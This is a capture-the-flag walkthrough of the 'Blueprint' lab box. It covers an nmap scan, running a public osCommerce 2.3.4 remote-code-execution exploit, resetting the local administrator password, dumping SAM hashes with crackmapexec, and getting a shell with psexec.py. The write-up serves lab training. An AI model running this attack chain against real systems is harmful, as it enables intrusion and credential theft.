# Blueprint ## Nmap ``` sudo nmap 10.10.153.99 -sV -sS PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows ``` Starting out we check port 8080 and find that a web server is running. The root page presents us with an index page where we see the commerce system oscommerce 2.3.4 is installed. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbwVUXcN9qT7m8Q9olRs0%2Fimage.png?alt=media\&token=215118f3-02e8-4209-9132-cc938faaf0e6) A simple preliminary check with `searchsploit` shows multiple vulnerabilities with this version. ``` searchsploit oscommerce 2.3.4 -w ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQtTjKVIa1cVgxvnv5NrT%2Fimage.png?alt=media\&token=2ef0a20f-3c04-45e1-aca8-0f8317d67eec) Searching for Remote Code Execution exploits on GitHub shows a PoC from the user nobodyatall648. GitHub: Which has the following definition for the exploit: *"Exploiting the install.php finish process by injecting php payload into the db\_database parameter & read the system command output from configure.php"*. Using the example provided on GitHub we clone the repo and run with the following syntax: ``` python3 exploit.py http:///oscommerce-2.3.4/catalog/ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FU7VcMMVnhZuhe7TlBQOm%2Fimage.png?alt=media\&token=b2529034-660e-4de2-b19b-a6c505ec2822) After gaining a SYSTEM level shell on the target system we now aim to gain a proper reverse shell. As well as dump the hashes from the target system. With SYSTEM access we change the local administrator password. ``` net user administrator Password123 ``` Then use `crackmapexec` to dump the NTLM hashes from the SAM file. ```bash crackmapexec smb '10.10.153.99' -u 'Administrator' -p 'Password123' --local-auth --sam ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FI08pJoYvG4ZMZvDPEh1U%2Fimage.png?alt=media\&token=e3e6c01c-8672-4d58-a82b-9cffc041705f) After dumping hashes from SAM we then use `psexec.py` to gain shell access to the target system. ``` psexec.py ./administrator:'Password123'@'10.10.153.99' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Ff48FlNcjDWicnFyD0pjk%2Fimage.png?alt=media\&token=59cb8f02-e42b-4de0-9323-e2e0ffc52569)